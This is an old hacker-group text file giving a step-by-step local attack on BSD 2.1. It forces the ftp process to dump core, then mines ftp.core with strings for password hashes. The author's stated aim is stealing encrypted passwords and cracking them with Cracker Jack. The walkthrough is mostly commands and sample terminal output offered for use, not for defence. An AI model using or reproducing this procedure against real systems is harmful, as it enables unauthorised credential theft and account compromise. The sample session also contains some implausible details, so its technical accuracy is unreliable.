FTP.CORE attack for BSD 2.1
-----------------------------------------------------------------------------------------------------------------
by The Bronc Buster 
bbuster@succeed.net
http://www2.succeed.net/~bbuster
Made for The Infected
www.infected.com
-----------------------------------------------------------------------------------------------------------------

This is a relativly simple attack, and can be done as ANY LEGIT user on a BSD 2.1 system. The focus of this attack is to get the ftp daemond to produce a core dump. When it dumps, all the information it has used up to the point it dumps will be stored in a file, in the the directory you are in, called "ftp.core". This file will contain shell and enviornment varibles, paths, and other misc stuff. What we will be looking for is the unshadowed passwd file. As this process has to access the passwd file to make sure you're legit, it stores all the information proir to your user in a buffer, and it will have to unshadow , or access the shadowed file, to do this. After you get the encrypted passwords, go find a copy of Cracker Jack and get to work. Ok, how to do it:


#ftp foobar.com
Welcom to foobar.com ftp site
blah blah blah
please enter login name> evil
that user requires a password> evil2
 User evil loged in welcome to foobar.com!
Remote set to type BIN
ftp>

(now hit ^Z to suspend the process)

#ps
  PID  TT  STAT      TIME COMMAND
 9526  p0  Ss     0:00.12 -csh (csh)
 9539  p0  R+     0:00.02 ps
1000   p0  Ss     0:00.22 ftp

(get the PID number to the ftp process)

#kill -11 1000

(kill the process)

#fg

(bring the ftp back to the foreground)

Process Killed Core Dump
#ls
home          mail         public_html        ftp.core
#strings ftp.core  > test
#pico test

From this point you have the .core in pico and should be able to pick it clean of all passwords and other information you might be interested in.

This has only been tested, and worked on BSD 2.1 so far, if it works on other systems, feel free to modify this text to reflect it.

Bronc Buster